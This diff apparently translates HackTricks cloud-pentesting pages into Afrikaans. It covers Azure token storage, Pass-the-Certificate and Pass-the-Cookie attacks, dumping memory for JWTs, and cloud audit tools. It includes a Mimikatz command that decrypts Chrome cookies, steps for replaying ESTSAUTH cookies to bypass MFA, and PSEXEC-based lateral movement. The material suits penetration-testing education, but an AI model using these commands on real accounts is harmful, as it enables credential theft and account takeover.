@@ -1,43 +1,39 @@ -# Az - Local Cloud Credentials +# Az - Plaaslike Wolk Krediete {{#include ../../../banners/hacktricks-training.md}} -## Local Token Storage and Security Considerations +## Plaaslike Token Berging en Sekuriteits oorwegings -### Azure CLI (Command-Line Interface) +### Azure CLI (Opdraglyn Koppelvlak) -Tokens and sensitive data are stored locally by Azure CLI, raising security concerns: +Tokens en sensitiewe data word plaaslik deur Azure CLI gestoor, wat sekuriteits bekommernisse oproep: -1. **Access Tokens**: Stored in plaintext within `accessTokens.json` located at `C:\Users\\.Azure`. -2. **Subscription Information**: `azureProfile.json`, in the same directory, holds subscription details. -3. **Log Files**: The `ErrorRecords` folder within `.azure` might contain logs with exposed credentials, such as: - - Executed commands with credentials embedded. - - URLs accessed using tokens, potentially revealing sensitive information. +1. **Toegangstokens**: Gestoor in platte teks binne `accessTokens.json` geleĂ« by `C:\Users\\.Azure`. +2. **Subskripsie Inligting**: `azureProfile.json`, in dieselfde gids, hou subskripsie besonderhede. +3. **LoglĂȘers**: Die `ErrorRecords` vouer binne `.azure` mag loglĂȘers bevat met blootgestelde krediete, soos: +- Uitgevoerde opdragte met krediete ingebed. +- URL's wat met tokens toeganklik gemaak is, wat moontlik sensitiewe inligting kan onthul. ### Azure PowerShell -Azure PowerShell also stores tokens and sensitive data, which can be accessed locally: +Azure PowerShell stoor ook tokens en sensitiewe data, wat plaaslik toeganklik is: -1. **Access Tokens**: `TokenCache.dat`, located at `C:\Users\\.Azure`, stores access tokens in plaintext. -2. **Service Principal Secrets**: These are stored unencrypted in `AzureRmContext.json`. -3. **Token Saving Feature**: Users have the ability to persist tokens using the `Save-AzContext` command, which should be used cautiously to prevent unauthorized access. +1. 
**Toegangstokens**: `TokenCache.dat`, geleĂ« by `C:\Users\\.Azure`, stoor toegangstokens in platte teks. +2. **Diens Prinsipaal Geheimen**: Hierdie word ongeĂ«nkripteer in `AzureRmContext.json` gestoor. +3. **Token Stoor Funksie**: Gebruikers het die vermoĂ« om tokens te behou met die `Save-AzContext` opdrag, wat versigtig gebruik moet word om ongeoorloofde toegang te voorkom. -## Automatic Tools to find them +## Outomatiese Gereedskap om hulle te vind - [**Winpeas**](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS/winPEASexe) - [**Get-AzurePasswords.ps1**](https://github.com/NetSPI/MicroBurst/blob/master/AzureRM/Get-AzurePasswords.ps1) -## Security Recommendations +## Sekuriteits Aanbevelings -Considering the storage of sensitive data in plaintext, it's crucial to secure these files and directories by: +Aangaande die berging van sensitiewe data in platte teks, is dit noodsaaklik om hierdie lĂȘers en gidse te beveilig deur: -- Limiting access rights to these files. -- Regularly monitoring and auditing these directories for unauthorized access or unexpected changes. -- Employing encryption for sensitive files where possible. -- Educating users about the risks and best practices for handling such sensitive information. +- Toegangregte tot hierdie lĂȘers te beperk. +- Gereeld hierdie gidse te monitor en te oudit vir ongeoorloofde toegang of onverwagte veranderinge. +- Enkripsie vir sensitiewe lĂȘers waar moontlik toe te pas. +- Gebruikers op te voed oor die risiko's en beste praktyke vir die hantering van sulke sensitiewe inligting. {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md index f2a5f2f4d..cfdfdbad0 100644 --- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md 
+++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md 
@@ -4,40 +4,32 @@ ## Pass the Certificate (Azure) -In Azure joined machines, it's possible to authenticate from one machine to another using certificates that **must be issued by Azure AD CA** for the required user (as the subject) when both machines support the **NegoEx** authentication mechanism. +In Azure-verbonden masjiene is dit moontlik om van een masjien na 'n ander te autentiseer met behulp van sertifikate wat **uitgereik moet word deur Azure AD CA** vir die vereiste gebruiker (as die onderwerp) wanneer beide masjiene die **NegoEx** autentifikasiemeganisme ondersteun. -In super simplified terms: +In super vereenvoudigde terme: -- The machine (client) initiating the connection **needs a certificate from Azure AD for a user**. -- Client creates a JSON Web Token (JWT) header containing PRT and other details, sign it using the Derived key (using the session key and the security context) and **sends it to Azure AD** -- Azure AD verifies the JWT signature using client session key and security context, checks validity of PRT and **responds** with the **certificate**. +- Die masjien (klient) wat die verbinding begin **het 'n sertifikaat van Azure AD vir 'n gebruiker** nodig. +- Klient skep 'n JSON Web Token (JWT) kop wat PRT en ander besonderhede bevat, teken dit met behulp van die Afgeleide sleutel (met die sessiesleutel en die sekuriteitskonteks) en **stuur dit na Azure AD**. +- Azure AD verifieer die JWT-handtekening met behulp van die klient se sessiesleutel en sekuriteitskonteks, kontroleer die geldigheid van PRT en **antwoord** met die **sertifikaat**. 
-In this scenario and after grabbing all the info needed for a [**Pass the PRT**](pass-the-prt.md) attack: +In hierdie scenario en nadat al die inligting wat nodig is vir 'n [**Pass the PRT**](pass-the-prt.md) aanval verkry is: -- Username -- Tenant ID +- Gebruikersnaam +- Huurder ID - PRT -- Security context -- Derived Key - -It's possible to **request P2P certificate** for the user with the tool [**PrtToCert**](https://github.com/morRubin/PrtToCert)**:** +- Sekuriteitskonteks +- Afgeleide Sleutel +Dit is moontlik om 'n **P2P-sertifikaat** vir die gebruiker aan te vra met die hulpmiddel [**PrtToCert**](https://github.com/morRubin/PrtToCert)**:** ```bash RequestCert.py [-h] --tenantId TENANTID --prt PRT --userName USERNAME --hexCtx HEXCTX --hexDerivedKey HEXDERIVEDKEY [--passPhrase PASSPHRASE] ``` - -The certificates will last the same as the PRT. To use the certificate you can use the python tool [**AzureADJoinedMachinePTC**](https://github.com/morRubin/AzureADJoinedMachinePTC) that will **authenticate** to the remote machine, run **PSEXEC** and **open a CMD** on the victim machine. This will allow us to use Mimikatz again to get the PRT of another user. - +Die sertifikate sal so lank duur as die PRT. Om die sertifikaat te gebruik, kan jy die python hulpmiddel [**AzureADJoinedMachinePTC**](https://github.com/morRubin/AzureADJoinedMachinePTC) gebruik wat **authentiseer** na die afstandmasjien, **PSEXEC** uitvoer en 'n **CMD** op die slagoffer masjien oopmaak. Dit sal ons toelaat om Mimikatz weer te gebruik om die PRT van 'n ander gebruiker te verkry. 
```bash Main.py [-h] --usercert USERCERT --certpass CERTPASS --remoteip REMOTEIP ``` +## Verwysings -## References - -- For more details about how Pass the Certificate works check the original post [https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597](https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597) +- Vir meer besonderhede oor hoe Pass the Certificate werk, kyk na die oorspronklike pos [https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597](https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md index f6695c40a..4a2ecec8d 100644 --- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md 
@@ -2,40 +2,34 @@ {{#include ../../../banners/hacktricks-training.md}} -## Why Cookies? +## Waarom Koekies? -Browser **cookies** are a great mechanism to **bypass authentication and MFA**. Because the user has already authenticated in the application, the session **cookie** can just be used to **access data** as that user, without needing to re-authenticate. +Bladsy **koekies** is 'n uitstekende meganisme om **authentisering en MFA** te **omseil**. Omdat die gebruiker reeds in die toepassing geverifieer is, kan die sessie **koekie** net gebruik word om **data** as daardie gebruiker te **toegang**, sonder om weer te verifieer. -You can see where are **browser cookies located** in: +Jy kan sien waar **bladsy koekies geleĂ«** is in: {{#ref}} https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts?q=browse#google-chrome {{#endref}} -## Attack +## Aanval -The challenging part is that those **cookies are encrypted** for the **user** via the Microsoft Data Protection API (**DPAPI**). This is encrypted using cryptographic [keys tied to the user](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords) the cookies belong to. You can find more information about this in: +Die uitdagende deel is dat daardie **koekies geĂ«nkripteer** is vir die **gebruiker** via die Microsoft Data Protection API (**DPAPI**). Dit is geĂ«nkripteer met kriptografiese [sleutels wat aan die gebruiker gekoppel is](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords) waartoe die koekies behoort. 
Jy kan meer inligting hieroor vind in: {{#ref}} https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords {{#endref}} -With Mimikatz in hand, I am able to **extract a user’s cookies** even though they are encrypted with this command: - +Met Mimikatz in die hand, kan ek **'n gebruiker se koekies** onttrek, selfs al is hulle geĂ«nkripteer met hierdie opdrag: ```bash mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\cookies /unprotect" exit ``` +Vir Azure, is ons bekommerd oor die outentikasie koekies insluitend **`ESTSAUTH`**, **`ESTSAUTHPERSISTENT`**, en **`ESTSAUTHLIGHT`**. Daardie is daar omdat die gebruiker onlangs aktief op Azure was. -For Azure, we care about the authentication cookies including **`ESTSAUTH`**, **`ESTSAUTHPERSISTENT`**, and **`ESTSAUTHLIGHT`**. Those are there because the user has been active on Azure lately. - -Just navigate to login.microsoftonline.com and add the cookie **`ESTSAUTHPERSISTENT`** (generated by “Stay Signed In” option) or **`ESTSAUTH`**. And you will be authenticated. +Net navigeer na login.microsoftonline.com en voeg die koekie **`ESTSAUTHPERSISTENT`** (gegenereer deur die “Bly Teken In” opsie) of **`ESTSAUTH`** by. En jy sal outentiseer wees. ## References - [https://stealthbits.com/blog/bypassing-mfa-with-pass-the-cookie/](https://stealthbits.com/blog/bypassing-mfa-with-pass-the-cookie/) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md index 28bc5b415..16d5854fe 100644 --- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md 
+++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md @@ -1,11 +1,7 @@ -# Az - Phishing Primary Refresh Token (Microsoft Entra) +# Az - Phishing PrimĂȘre Vernuwings Teken (Microsoft Entra) {{#include ../../../banners/hacktricks-training.md}} -**Check:** [**https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/**](https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/) +**Kontroleer:** [**https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/**](https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md index a79c7a659..376703f13 100644 --- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md 
@@ -1,11 +1,7 @@ -# Az - Primary Refresh Token (PRT) +# Az - PrimĂȘre Vernuwings Teken (PRT) {{#include ../../../banners/hacktricks-training.md}} -**Chec the post in** [**https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/**](https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/) although another post explaining the same can be found in [**https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30**](https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30) +**Kyk na die pos in** [**https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/**](https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/) alhoewel 'n ander pos wat dieselfde verduidelik, gevind kan word in [**https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30**](https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md index 1ba819b3a..86ce7ccb4 100644 --- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md 
@@ -2,16 +2,15 @@ {{#include ../../../banners/hacktricks-training.md}} -## **Basic Information** +## **Basiese Inligting** -As explained in [**this video**](https://www.youtube.com/watch?v=OHKZkXC4Duw), some Microsoft software synchronized with the cloud (Excel, Teams...) might **store access tokens in clear-text in memory**. So just **dumping** the **memory** of the process and **grepping for JWT tokens** might grant you access over several resources of the victim in the cloud bypassing MFA. +Soos verduidelik in [**hierdie video**](https://www.youtube.com/watch?v=OHKZkXC4Duw), sommige Microsoft sagteware wat met die wolk gesinkroniseer is (Excel, Teams...) mag **toegangstokens in duidelike teks in geheue stoor**. So net **dumping** die **geheue** van die proses en **grepping vir JWT tokens** mag jou toegang gee tot verskeie hulpbronne van die slagoffer in die wolk terwyl jy MFA omseil. -Steps: - -1. Dump the excel processes synchronized with in EntraID user with your favourite tool. -2. Run: `string excel.dmp | grep 'eyJ0'` and find several tokens in the output -3. Find the tokens that interest you the most and run tools over them: +Stappe: +1. Dump die excel prosesse wat gesinkroniseer is met die EntraID gebruiker met jou gunsteling hulpmiddel. +2. Voer in: `string excel.dmp | grep 'eyJ0'` en vind verskeie tokens in die uitvoer +3. Vind die tokens wat jou die meeste interesseer en voer hulpmiddels oor hulle uit: ```bash # Check the identity of the token curl -s -H "Authorization: Bearer " https://graph.microsoft.com/v1.0/me | jq @@ -31,11 +30,6 @@ curl -s -H "Authorization: Bearer " 'https://graph.microsoft.com/v1.0/sit ┌──(magichk㉿black-pearl)-[~] └─$ curl -o -L -H "Authorization: Bearer " '<@microsoft.graph.downloadUrl>' ``` - -**Note that these kind of access tokens can be also found inside other processes.** +**Let daarop dat hierdie tipe toegangstokens ook binne ander prosesse gevind kan word.** {{#include ../../../banners/hacktricks-training.md}} - - - - 
diff --git a/src/pentesting-cloud/azure-security/az-permissions-for-a-pentest.md b/src/pentesting-cloud/azure-security/az-permissions-for-a-pentest.md index 39ee71d6c..e4bc76005 100644 --- a/src/pentesting-cloud/azure-security/az-permissions-for-a-pentest.md +++ b/src/pentesting-cloud/azure-security/az-permissions-for-a-pentest.md @@ -1,11 +1,7 @@ -# Az - Permissions for a Pentest +# Az - Toestemmings vir 'n Pentest {{#include ../../banners/hacktricks-training.md}} -To start the tests you should have access with a user with **Reader permissions over the subscription** and **Global Reader role in AzureAD**. If even in that case you are **not able to access the content of the Storage accounts** you can fix it with the **role Storage Account Contributor**. +Om die toetse te begin, moet jy toegang hĂȘ met 'n gebruiker met **Leser toestemmings oor die subskripsie** en **Globale Leser rol in AzureAD**. As jy selfs in daardie geval **nie in staat is om toegang te verkry tot die inhoud van die Stoor rekeninge** nie, kan jy dit regstel met die **rol Stoor Rekening Bydraer**. {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/pentesting-cloud-methodology.md b/src/pentesting-cloud/pentesting-cloud-methodology.md index 0be67db54..473315549 100644 --- a/src/pentesting-cloud/pentesting-cloud-methodology.md +++ b/src/pentesting-cloud/pentesting-cloud-methodology.md 
@@ -6,43 +6,42 @@ ## Basic Methodology -Each cloud has its own peculiarities but in general there are a few **common things a pentester should check** when testing a cloud environment: +Elke wolk het sy eie eienaardighede, maar oor die algemeen is daar 'n paar **gemeenskaplike dinge wat 'n pentester moet nagaan** wanneer 'n wolkomgewing getoets word: -- **Benchmark checks** - - This will help you **understand the size** of the environment and **services used** - - It will allow you also to find some **quick misconfigurations** as you can perform most of this tests with **automated tools** -- **Services Enumeration** - - You probably won't find much more misconfigurations here if you performed correctly the benchmark tests, but you might find some that weren't being looked for in the benchmark test. - - This will allow you to know **what is exactly being used** in the cloud env - - This will help a lot in the next steps -- **Check exposed assets** - - This can be done during the previous section, you need to **find out everything that is potentially exposed** to the Internet somehow and how can it be accessed. - - Here I'm taking **manually exposed infrastructure** like instances with web pages or other ports being exposed, and also about other **cloud managed services that can be configured** to be exposed (such as DBs or buckets) - - Then you should check **if that resource can be exposed or not** (confidential information? vulnerabilities? misconfigurations in the exposed service?) -- **Check permissions** - - Here you should **find out all the permissions of each role/user** inside the cloud and how are they used - - Too **many highly privileged** (control everything) accounts? Generated keys not used?... 
Most of these check should have been done in the benchmark tests already - - If the client is using OpenID or SAML or other **federation** you might need to ask them for further **information** about **how is being each role assigned** (it's not the same that the admin role is assigned to 1 user or to 100) - - It's **not enough to find** which users has **admin** permissions "\*:\*". There are a lot of **other permissions** that depending on the services used can be very **sensitive**. - - Moreover, there are **potential privesc** ways to follow abusing permissions. All this things should be taken into account and **as much privesc paths as possible** should be reported. -- **Check Integrations** - - It's highly probably that **integrations with other clouds or SaaS** are being used inside the cloud env. - - For **integrations of the cloud you are auditing** with other platform you should notify **who has access to (ab)use that integration** and you should ask **how sensitive** is the action being performed.\ - For example, who can write in an AWS bucket where GCP is getting data from (ask how sensitive is the action in GCP treating that data). - - For **integrations inside the cloud you are auditing** from external platforms, you should ask **who has access externally to (ab)use that integration** and check how is that data being used.\ - For example, if a service is using a Docker image hosted in GCR, you should ask who has access to modify that and which sensitive info and access will get that image when executed inside an AWS cloud. +- **Benchmark kontroles** +- Dit sal jou help om **die grootte** van die omgewing en **dienste wat gebruik word** te **begryp**. +- Dit sal jou ook toelaat om 'n paar **vinnige miskonfigurasies** te vind, aangesien jy die meeste van hierdie toetse met **geoutomatiseerde gereedskap** kan uitvoer. 
+- **Dienste Enumerasie** +- Jy sal waarskynlik nie veel meer miskonfigurasies hier vind as jy die benchmark toetse korrek uitgevoer het nie, maar jy mag dalk sommige vind wat nie in die benchmark toets gesoek is nie. +- Dit sal jou toelaat om te weet **wat presies gebruik word** in die wolkomgewing. +- Dit sal baie help in die volgende stappe. +- **Kontroleer blootgestelde bates** +- Dit kan gedoen word tydens die vorige afdeling, jy moet **uitvind alles wat potensieel blootgestel is** aan die Internet op een of ander manier en hoe dit toegang kan verkry. +- Hier neem ek **handmatig blootgestelde infrastruktuur** soos instansies met webbladsye of ander poorte wat blootgestel word, en ook oor ander **wolkkontroleerde dienste wat geconfigureer kan word** om blootgestel te word (soos DB's of emmers). +- Dan moet jy nagaan **of daardie hulpbron blootgestel kan word of nie** (vertroulike inligting? kwesbaarhede? miskonfigurasies in die blootgestelde diens?). +- **Kontroleer toestemmings** +- Hier moet jy **uitvind wat die toestemmings van elke rol/gebruiker** binne die wolk is en hoe dit gebruik word. +- Te **veel hoogs bevoorregte** (beheer alles) rekeninge? GekreĂ«erde sleutels wat nie gebruik word?... Die meeste van hierdie kontroles sou reeds in die benchmark toetse gedoen moes gewees het. +- As die kliĂ«nt OpenID of SAML of ander **federasie** gebruik, mag jy hulle moet vra vir verdere **inligting** oor **hoe elke rol toegeken word** (dit is nie dieselfde dat die admin rol aan 1 gebruiker of aan 100 toegeken word nie). +- Dit is **nie genoeg om te vind** watter gebruikers **admin** toestemmings het "\*:\*". Daar is baie **ander toestemmings** wat, afhangende van die dienste wat gebruik word, baie **sensitief** kan wees. +- Boonop is daar **potensiĂ«le privesc** maniere om te volg deur misbruik van toestemmings. Al hierdie dinge moet in ag geneem word en **so veel privesc paaie as moontlik** moet gerapporteer word. 
+- **Kontroleer Integrasies** +- Dit is hoogs waarskynlik dat **integrasies met ander wolke of SaaS** binne die wolkomgewing gebruik word. +- Vir **integrasies van die wolk wat jy oudit** met ander platforms moet jy **ken wie toegang het tot (mis)bruik van daardie integrasie** en jy moet vra **hoe sensitief** die aksie wat uitgevoer word is.\ +Byvoorbeeld, wie kan skryf in 'n AWS-emmer waar GCP data van ontvang (vra hoe sensitief die aksie in GCP is wat daardie data hanteer). +- Vir **integrasies binne die wolk wat jy oudit** van eksterne platforms, moet jy vra **wie toegang het om (mis)bruik te maak van daardie integrasie** en kyk hoe daardie data gebruik word.\ +Byvoorbeeld, as 'n diens 'n Docker-beeld gebruik wat in GCR gehos te is, moet jy vra wie toegang het om dit te wysig en watter sensitiewe inligting en toegang daardie beeld sal kry wanneer dit binne 'n AWS-wolk uitgevoer word. ## Multi-Cloud tools -There are several tools that can be used to test different cloud environments. The installation steps and links are going to be indicated in this section. +Daar is verskeie gereedskap wat gebruik kan word om verskillende wolkomgewings te toets. Die installasietappe en skakels sal in hierdie afdeling aangedui word. ### [PurplePanda](https://github.com/carlospolop/purplepanda) -A tool to **identify bad configurations and privesc path in clouds and across clouds/SaaS.** +'n Gereedskap om **slegte konfigurasies en privesc paaie in wolke en oor wolke/SaaS te identifiseer.** {{#tabs }} {{#tab name="Install" }} - ```bash # You need to install and run neo4j also git clone https://github.com/carlospolop/PurplePanda 
@@ -54,29 +53,25 @@ export PURPLEPANDA_NEO4J_URL="bolt://neo4j@localhost:7687" export PURPLEPANDA_PWD="neo4j_pwd_4_purplepanda" python3 main.py -h # Get help ``` - {{#endtab }} {{#tab name="GCP" }} - ```bash export GOOGLE_DISCOVERY=$(echo 'google: - file_path: "" - file_path: "" - service_account_id: "some-sa-email@sidentifier.iam.gserviceaccount.com"' | base64) +service_account_id: "some-sa-email@sidentifier.iam.gserviceaccount.com"' | base64) python3 main.py -a -p google #Get basic info of the account to check it's correctly configured python3 main.py -e -p google #Enumerate the env ``` - {{#endtab }} {{#endtabs }} ### [Prowler](https://github.com/prowler-cloud/prowler) -It supports **AWS, GCP & Azure**. Check how to configure each provider in [https://docs.prowler.cloud/en/latest/#aws](https://docs.prowler.cloud/en/latest/#aws) - +Dit ondersteun **AWS, GCP & Azure**. Kyk hoe om elke verskaffer te konfigureer in [https://docs.prowler.cloud/en/latest/#aws](https://docs.prowler.cloud/en/latest/#aws) ```bash # Install pip install prowler @@ -91,14 +86,12 @@ prowler aws --profile custom-profile [-M csv json json-asff html] prowler --list-checks prowler --list-services ``` - ### [CloudSploit](https://github.com/aquasecurity/cloudsploit) AWS, Azure, Github, Google, Oracle, Alibaba {{#tabs }} -{{#tab name="Install" }} - +{{#tab name="Installeer" }} ```bash # Install git clone https://github.com/aquasecurity/cloudsploit.git @@ -107,16 +100,13 @@ npm install ./index.js -h ## Docker instructions in github ``` - {{#endtab }} {{#tab name="GCP" }} - ```bash ## You need to have creds for a service account and set them in config.js file ./index.js --cloud google --config ``` - {{#endtab }} {{#endtabs }} @@ -125,8 +115,7 @@ npm install AWS, Azure, GCP, Alibaba Cloud, Oracle Cloud Infrastructure {{#tabs }} -{{#tab name="Install" }} - +{{#tab name="Installeer" }} ```bash mkdir scout; cd scout virtualenv -p python3 venv 
@@ -135,42 +124,36 @@ pip install scoutsuite scout --help ## Using Docker: https://github.com/nccgroup/ScoutSuite/wiki/Docker-Image ``` - {{#endtab }} {{#tab name="GCP" }} - ```bash scout gcp --report-dir /tmp/gcp --user-account --all-projects ## use "--service-account KEY_FILE" instead of "--user-account" to use a service account SCOUT_FOLDER_REPORT="/tmp" for pid in $(gcloud projects list --format="value(projectId)"); do - echo "================================================" - echo "Checking $pid" - mkdir "$SCOUT_FOLDER_REPORT/$pid" - scout gcp --report-dir "$SCOUT_FOLDER_REPORT/$pid" --no-browser --user-account --project-id "$pid" +echo "================================================" +echo "Checking $pid" +mkdir "$SCOUT_FOLDER_REPORT/$pid" +scout gcp --report-dir "$SCOUT_FOLDER_REPORT/$pid" --no-browser --user-account --project-id "$pid" done ``` - {{#endtab }} {{#endtabs }} ### [Steampipe](https://github.com/turbot) {{#tabs }} -{{#tab name="Install" }} -Download and install Steampipe ([https://steampipe.io/downloads](https://steampipe.io/downloads)). Or use Brew: - +{{#tab name="Installeer" }} +Laai Steampipe af en installeer dit ([https://steampipe.io/downloads](https://steampipe.io/downloads)). Of gebruik Brew: ``` brew tap turbot/tap brew install steampipe ``` - {{#endtab }} {{#tab name="GCP" }} - ```bash # Install gcp plugin steampipe plugin install gcp @@ -183,13 +166,11 @@ steampipe dashboard # To run all the checks from rhe cli steampipe check all ``` -
-Check all Projects - -In order to check all the projects you need to generate the `gcp.spc` file indicating all the projects to test. You can just follow the indications from the following script +Kontroleer alle Projekte +Om al die projekte te kontroleer, moet jy die `gcp.spc` lĂȘer genereer wat al die projekte aandui wat getoets moet word. Jy kan net die aanwysings van die volgende skrif volg. ```bash FILEPATH="/tmp/gcp.spc" rm -rf "$FILEPATH" 2>/dev/null @@ -197,32 +178,30 @@ rm -rf "$FILEPATH" 2>/dev/null # Generate a json like object for each project for pid in $(gcloud projects list --format="value(projectId)"); do echo "connection \"gcp_$(echo -n $pid | tr "-" "_" )\" { - plugin = \"gcp\" - project = \"$pid\" +plugin = \"gcp\" +project = \"$pid\" }" >> "$FILEPATH" done # Generate the aggragator to call echo 'connection "gcp_all" { - plugin = "gcp" - type = "aggregator" - connections = ["gcp_*"] +plugin = "gcp" +type = "aggregator" +connections = ["gcp_*"] }' >> "$FILEPATH" echo "Copy $FILEPATH in ~/.steampipe/config/gcp.spc if it was correctly generated" ``` -
-To check **other GCP insights** (useful for enumerating services) use: [https://github.com/turbot/steampipe-mod-gcp-insights](https://github.com/turbot/steampipe-mod-gcp-insights) +Om **ander GCP insigte** te kontroleer (nuttig vir die opspoor van dienste) gebruik: [https://github.com/turbot/steampipe-mod-gcp-insights](https://github.com/turbot/steampipe-mod-gcp-insights) -To check Terraform GCP code: [https://github.com/turbot/steampipe-mod-terraform-gcp-compliance](https://github.com/turbot/steampipe-mod-terraform-gcp-compliance) +Om Terraform GCP kode te kontroleer: [https://github.com/turbot/steampipe-mod-terraform-gcp-compliance](https://github.com/turbot/steampipe-mod-terraform-gcp-compliance) -More GCP plugins of Steampipe: [https://github.com/turbot?q=gcp](https://github.com/turbot?q=gcp) +Meer GCP plugins van Steampipe: [https://github.com/turbot?q=gcp](https://github.com/turbot?q=gcp) {{#endtab }} {{#tab name="AWS" }} - ```bash # Install aws plugin steampipe plugin install aws 
@@ -246,29 +225,27 @@ cd steampipe-mod-aws-compliance steampipe dashboard # To see results in browser steampipe check all --export=/tmp/output4.json ``` +Om Terraform AWS kode te kontroleer: [https://github.com/turbot/steampipe-mod-terraform-aws-compliance](https://github.com/turbot/steampipe-mod-terraform-aws-compliance) -To check Terraform AWS code: [https://github.com/turbot/steampipe-mod-terraform-aws-compliance](https://github.com/turbot/steampipe-mod-terraform-aws-compliance) - -More AWS plugins of Steampipe: [https://github.com/orgs/turbot/repositories?q=aws](https://github.com/orgs/turbot/repositories?q=aws) +Meer AWS-inproppe van Steampipe: [https://github.com/orgs/turbot/repositories?q=aws](https://github.com/orgs/turbot/repositories?q=aws) {{#endtab }} {{#endtabs }} ### [~~cs-suite~~](https://github.com/SecurityFTW/cs-suite) AWS, GCP, Azure, DigitalOcean.\ -It requires python2.7 and looks unmaintained. +Dit vereis python2.7 en lyk ononderhou. ### Nessus -Nessus has an _**Audit Cloud Infrastructure**_ scan supporting: AWS, Azure, Office 365, Rackspace, Salesforce. Some extra configurations in **Azure** are needed to obtain a **Client Id**. +Nessus het 'n _**Audit Cloud Infrastructure**_ skandering wat ondersteun: AWS, Azure, Office 365, Rackspace, Salesforce. Sommige ekstra konfigurasies in **Azure** is nodig om 'n **Client Id** te verkry. ### [**cloudlist**](https://github.com/projectdiscovery/cloudlist) -Cloudlist is a **multi-cloud tool for getting Assets** (Hostnames, IP Addresses) from Cloud Providers. +Cloudlist is 'n **multi-cloud hulpmiddel om Bate** (Gasname, IP Adresse) van Cloud Verskaffers te verkry. {{#tabs }} {{#tab name="Cloudlist" }} - ```bash cd /tmp wget https://github.com/projectdiscovery/cloudlist/releases/latest/download/cloudlist_1.0.1_macOS_arm64.zip 
@@ -276,46 +253,40 @@ unzip cloudlist_1.0.1_macOS_arm64.zip chmod +x cloudlist sudo mv cloudlist /usr/local/bin ``` - {{#endtab }} -{{#tab name="Second Tab" }} - +{{#tab name="Tweede Tab" }} ```bash ## For GCP it requires service account JSON credentials cloudlist -config ``` - {{#endtab }} {{#endtabs }} ### [**cartography**](https://github.com/lyft/cartography) -Cartography is a Python tool that consolidates infrastructure assets and the relationships between them in an intuitive graph view powered by a Neo4j database. +Cartography is 'n Python-gereedskap wat infrastruktuur bates en die verhoudings tussen hulle in 'n intuĂŻtiewe grafiekweergave saamvoeg, aangedryf deur 'n Neo4j-databasis. {{#tabs }} {{#tab name="Install" }} - ```bash # Installation docker image pull ghcr.io/lyft/cartography docker run --platform linux/amd64 ghcr.io/lyft/cartography cartography --help ## Install a Neo4j DB version 3.5.* ``` - {{#endtab }} {{#tab name="GCP" }} - ```bash docker run --platform linux/amd64 \ - --volume "$HOME/.config/gcloud/application_default_credentials.json:/application_default_credentials.json" \ - -e GOOGLE_APPLICATION_CREDENTIALS="/application_default_credentials.json" \ - 